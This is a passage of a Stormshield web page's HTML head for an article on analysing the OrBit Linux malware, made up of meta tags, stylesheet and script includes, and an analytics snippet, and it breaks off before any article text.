<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8" />
	
				<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
		            <link rel="shortcut icon" type="image/x-icon" href="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_favicon.png">
            <link rel="apple-touch-icon" href="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_favicon.png"/>
        
	<link rel="profile" href="http://gmpg.org/xfn/11" />
	<link rel="pingback" href="https://www.stormshield.com/xmlrpc.php" />

	<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<link rel="alternate" hreflang="en" href="https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware/" />
<link rel="alternate" hreflang="fr" href="https://www.stormshield.com/fr/actus/orbit-analyse-malware-linux/" />
<link rel="alternate" hreflang="x-default" href="https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware/" />

	<!-- This site is optimized with the Yoast SEO plugin v20.1 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>OrBit malware: analysis of a threat to Linux | Stormshield</title>
	<meta name="description" content="Stealer, backdoor, executable, dropper and library: a complete analysis of the OrBit malware with Stormshield&#039;s CTI team." />
	<link rel="canonical" href="https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="OrBit malware: analysis of a threat to Linux | Stormshield" />
	<meta property="og:description" content="Stealer, backdoor, executable, dropper and library: a complete analysis of the OrBit malware with Stormshield&#039;s CTI team." />
	<meta property="og:url" content="https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware" />
	<meta property="og:site_name" content="Stormshield" />
	<meta property="article:publisher" content="https://www.facebook.com/StormshieldOfficial/" />
	<meta property="article:published_time" content="2023-01-02T14:36:41+00:00" />
	<meta property="article:modified_time" content="2023-01-06T08:30:15+00:00" />
	<meta property="og:image" content="https://www.stormshield.com/wp-content/uploads/shutterstock-266369672.jpg" />
	<meta property="og:image:width" content="1000" />
	<meta property="og:image:height" content="667" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="author" content="Louis Deschanel" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@Stormshield_" />
	<meta name="twitter:site" content="@Stormshield_" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Louis Deschanel" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="20 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware","url":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware","name":"OrBit malware: analysis of a threat to Linux | Stormshield","isPartOf":{"@id":"https://www.stormshield.com/#website"},"primaryImageOfPage":{"@id":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware#primaryimage"},"image":{"@id":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware#primaryimage"},"thumbnailUrl":"https://www.stormshield.com/wp-content/uploads/shutterstock-266369672.jpg","datePublished":"2023-01-02T14:36:41+00:00","dateModified":"2023-01-06T08:30:15+00:00","author":{"@id":"https://www.stormshield.com/#/schema/person/8995a616d4f3abe73b461cc7182283fd"},"description":"Stealer, backdoor, executable, dropper and library: a complete analysis of the OrBit malware with Stormshield's CTI team.","breadcrumb":{"@id":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware#primaryimage","url":"https://www.stormshield.com/wp-content/uploads/shutterstock-266369672.jpg","contentUrl":"https://www.stormshield.com/wp-content/uploads/shutterstock-266369672.jpg","width":1000,"height":667},{"@type":"BreadcrumbList","@id":"https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.stormshield.com/"},{"@type":"ListItem","position":2,"name":"OrBit: advanced analysis of a Linux dedicated malware"}]},{"@type":"WebSite","@id":"https://www.stormshield.com/#website","url":"https://www.stormshield.com/","name":"Stormshield","description":"Stormshield","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.stormshield.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https://www.stormshield.com/#/schema/person/8995a616d4f3abe73b461cc7182283fd","name":"Louis Deschanel","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.stormshield.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/3a7027e3b880cbe655a3ff3d926d6613?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/3a7027e3b880cbe655a3ff3d926d6613?s=96&d=mm&r=g","caption":"Louis Deschanel"}}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Stormshield &raquo; Feed" href="https://www.stormshield.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Stormshield &raquo; Comments Feed" href="https://www.stormshield.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Stormshield &raquo; OrBit: advanced analysis of a Linux dedicated malware Comments Feed" href="https://www.stormshield.com/news/orbit-analysis-of-a-linux-dedicated-malware/feed/" />
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css' href='https://www.stormshield.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' />
<style id='wab-pastacode-style-inline-css' type='text/css'>
.blockcode-settings__wrapper{background:#f2f2f2;border:1px solid #dbdbdb;display:flex;flex-wrap:wrap;gap:1rem;padding:1rem;position:relative}.blockcode-settings__wrapper>*{flex-basis:40%;flex-grow:1}.cm-editor{padding-bottom:1em;padding-top:1em}.cm-content,.cm-gutters{font-family:Menlo,Monaco,Lucida Console,monospace!important;line-height:1.5!important}.cm-gutters .cm-lineNumbers{border-right:1px solid;padding-right:9px;width:3rem}

</style>
<link rel='stylesheet' id='classic-theme-styles-css' href='https://www.stormshield.com/wp-includes/css/classic-themes.min.css' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
</style>
<link rel='stylesheet' id='stormshield-css' href='https://www.stormshield.com/wp-content/plugins/wp-stormshield-module/public/css/stormshield-public.css' type='text/css' media='all' />
<link rel='stylesheet' id='wpml-legacy-dropdown-0-css' href='//www.stormshield.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-dropdown/style.min.css' type='text/css' media='all' />
<style id='wpml-legacy-dropdown-0-inline-css' type='text/css'>
.wpml-ls-statics-shortcode_actions{background-color:#eeeeee;}.wpml-ls-statics-shortcode_actions, .wpml-ls-statics-shortcode_actions .wpml-ls-sub-menu, .wpml-ls-statics-shortcode_actions a {border-color:#cdcdcd;}.wpml-ls-statics-shortcode_actions a {color:#444444;background-color:#ffffff;}.wpml-ls-statics-shortcode_actions a:hover,.wpml-ls-statics-shortcode_actions a:focus {color:#000000;background-color:#eeeeee;}.wpml-ls-statics-shortcode_actions .wpml-ls-current-language>a {color:#444444;background-color:#ffffff;}.wpml-ls-statics-shortcode_actions .wpml-ls-current-language:hover>a, .wpml-ls-statics-shortcode_actions .wpml-ls-current-language>a:focus {color:#000000;background-color:#eeeeee;}
</style>
<link rel='stylesheet' id='search-filter-plugin-styles-css' href='https://www.stormshield.com/wp-content/plugins/search-filter-pro/public/assets/css/search-filter.min.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='cms-navigation-style-base-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1677083147' type='text/css' media='screen' />
<link data-minify="1" rel='stylesheet' id='cms-navigation-style-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1677083147' type='text/css' media='screen' />
<link rel='stylesheet' id='mediaelement-css' href='https://www.stormshield.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css' href='https://www.stormshield.com/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='bridge-default-style-css' href='https://www.stormshield.com/wp-content/themes/bridge/style.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-qode-font_awesome-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/font-awesome/css/font-awesome.min.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-qode-font_elegant-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/elegant-icons/style.min.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-qode-linea_icons-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/linea-icons/style.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-qode-dripicons-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/dripicons/dripicons.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-qode-kiko-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/kiko/kiko-all.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-qode-font_awesome_5-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/font-awesome-5/css/font-awesome-5.min.css?ver=1677083147' type='text/css' media='all' />
<link rel='stylesheet' id='bridge-stylesheet-css' href='https://www.stormshield.com/wp-content/themes/bridge/css/stylesheet.min.css' type='text/css' media='all' />
<style id='bridge-stylesheet-inline-css' type='text/css'>
   .postid-351069.disabled_footer_top .footer_top_holder, .postid-351069.disabled_footer_bottom .footer_bottom_holder { display: none;}


</style>
<link data-minify="1" rel='stylesheet' id='bridge-print-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/print.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-style-dynamic-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/style_dynamic.css?ver=1677083147' type='text/css' media='all' />
<link rel='stylesheet' id='bridge-responsive-css' href='https://www.stormshield.com/wp-content/themes/bridge/css/responsive.min.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='bridge-style-dynamic-responsive-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/css/style_dynamic_responsive.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='js_composer_front-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=1677083147' type='text/css' media='all' />
<link rel='stylesheet' id='bridge-core-dashboard-style-css' href='https://www.stormshield.com/wp-content/plugins/bridge-core/modules/core-dashboard/assets/css/core-dashboard.min.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='stormshield-fonts-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/assets/css/fonts.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='childstyle-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/style.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='font-awesome-css-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/vendor/fontawesome-free-5.6.1-web/css/all.min.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='style_background-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/assets/css/background.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='style_typo-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/assets/css/typo.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='style_actussommaire-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/assets/css/actus_sommaire.css?ver=1677083310' type='text/css' media='all' />
<link rel='stylesheet' id='ubermenu-css' href='https://www.stormshield.com/wp-content/plugins/ubermenu/pro/assets/css/ubermenu.min.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='ubermenu-white-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/ubermenu/pro/assets/css/skins/white.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='ubermenu-font-awesome-all-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/ubermenu/assets/fontawesome/css/all.min.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='shokola-maps-search-public-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/shokola-maps-search/public/css/shokola-maps-search-public.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='shokola-maps-search-public-specific-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/shokola-maps-search/style.css?ver=1677083147' type='text/css' media='all' />
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js' async id='tp-tools-js'></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js' async id='revmin-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wp-stormshield-module/public/js/stormshield-public.js?ver=1677083147' id='stormshield-js' defer></script>
<script type='text/javascript' src='//www.stormshield.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-dropdown/script.min.js' id='wpml-legacy-dropdown-0-js' defer></script>
<script type='text/javascript' id='search-filter-plugin-build-js-extra'>
/* <![CDATA[ */
var SF_LDATA = {"ajax_url":"https:\/\/www.stormshield.com\/wp-admin\/admin-ajax.php","home_url":"https:\/\/www.stormshield.com\/","extensions":[]};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/search-filter-pro/public/assets/js/search-filter-build.min.js' id='search-filter-plugin-build-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/search-filter-pro/public/assets/js/chosen.jquery.min.js' id='search-filter-plugin-chosen-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/js/actus_sommaire.js?ver=1677083310' id='js_actussommaire-js' defer></script>
<script type='text/javascript' id='whp9158front.js6059-js-extra'>
/* <![CDATA[ */
var whp_local_data = {"add_url":"https:\/\/www.stormshield.com\/wp-admin\/post-new.php?post_type=event","ajaxurl":"https:\/\/www.stormshield.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wp-security-hardening/modules/js/front.js?ver=1677083147' id='whp9158front.js6059-js' defer></script>
<link rel="https://api.w.org/" href="https://www.stormshield.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.stormshield.com/wp-json/wp/v2/posts/351069" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.stormshield.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.stormshield.com/wp-includes/wlwmanifest.xml" />

<link rel="alternate" type="application/json+oembed" href="https://www.stormshield.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.stormshield.com%2Fnews%2Forbit-analysis-of-a-linux-dedicated-malware" />
<link rel="alternate" type="text/xml+oembed" href="https://www.stormshield.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.stormshield.com%2Fnews%2Forbit-analysis-of-a-linux-dedicated-malware&#038;format=xml" />
<style id="ubermenu-custom-generated-css">
/** Font Awesome 4 Compatibility **/
.fa{font-style:normal;font-variant:normal;font-weight:normal;font-family:FontAwesome;}

/** UberMenu Custom Menu Styles (Customizer) **/
/* main */
 .ubermenu-main { background:#ffffff; }
 .ubermenu-main .ubermenu-item-level-0 > .ubermenu-target { font-size:14px; text-transform:uppercase; color:#5b5c5f; }
 .ubermenu-main .ubermenu-nav .ubermenu-item.ubermenu-item-level-0 > .ubermenu-target { font-weight:bold; }
 .ubermenu.ubermenu-main .ubermenu-item-level-0:hover > .ubermenu-target, .ubermenu-main .ubermenu-item-level-0.ubermenu-active > .ubermenu-target { color:#015ca7; background:#ffffff; }
 .ubermenu-main .ubermenu-item-level-0.ubermenu-current-menu-item > .ubermenu-target, .ubermenu-main .ubermenu-item-level-0.ubermenu-current-menu-parent > .ubermenu-target, .ubermenu-main .ubermenu-item-level-0.ubermenu-current-menu-ancestor > .ubermenu-target { color:#015ca7; }
 .ubermenu.ubermenu-main .ubermenu-item-level-0 > .ubermenu-target { background:#ffffff; }
 .ubermenu-main .ubermenu-submenu.ubermenu-submenu-drop { background-color:#ffffff; }
 .ubermenu-main .ubermenu-submenu .ubermenu-item-header > .ubermenu-target { color:#015ca7; }


/* Status: Loaded from Transient */

</style>
    <!-- Google Tag Manager -->
    <script>(function (w, d, s, l, i) {
            w[l] = w[l] || [];
            w[l].push({
                'gtm.start':
                    new Date().getTime(), event: 'gtm.js'
            });
            var f = d.getElementsByTagName(s)[0],
                j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : '';
            j.async = true;
            j.src =
                'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
            f.parentNode.insertBefore(j, f);
        })(window, document, 'script', 'dataLayer', 'GTM-TDS34XC');</script>
    <!-- End Google Tag Manager -->

<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<script>function setREVStartSize(e){
			//window.requestAnimationFrame(function() {
				window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW;
				window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;
				try {
					var pw = document.getElementById(e.c).parentNode.offsetWidth,
						newh;
					pw = pw===0 || isNaN(pw) || (e.l=="fullwidth" || e.layout=="fullwidth") ? window.RSIW : pw;
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
					e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);
					e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);
					e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);
					e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);
					if(e.layout==="fullscreen" || e.l==="fullscreen")
						newh = Math.max(e.mh,window.RSIH);
					else{
						e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];
						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el;
						e.gh = Array.isArray(e.gh) ? e.gh : [e.gh];
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];
											
						var nl = new Array(e.rl.length),
							ix = 0,
							sl;
						e.tabw = e.tabhide>=pw ? 0 : e.tabw;
						e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw;
						e.tabh = e.tabhide>=pw ? 0 : e.tabh;
						e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh;
						for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i];
						sl = nl[0];
						for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;}
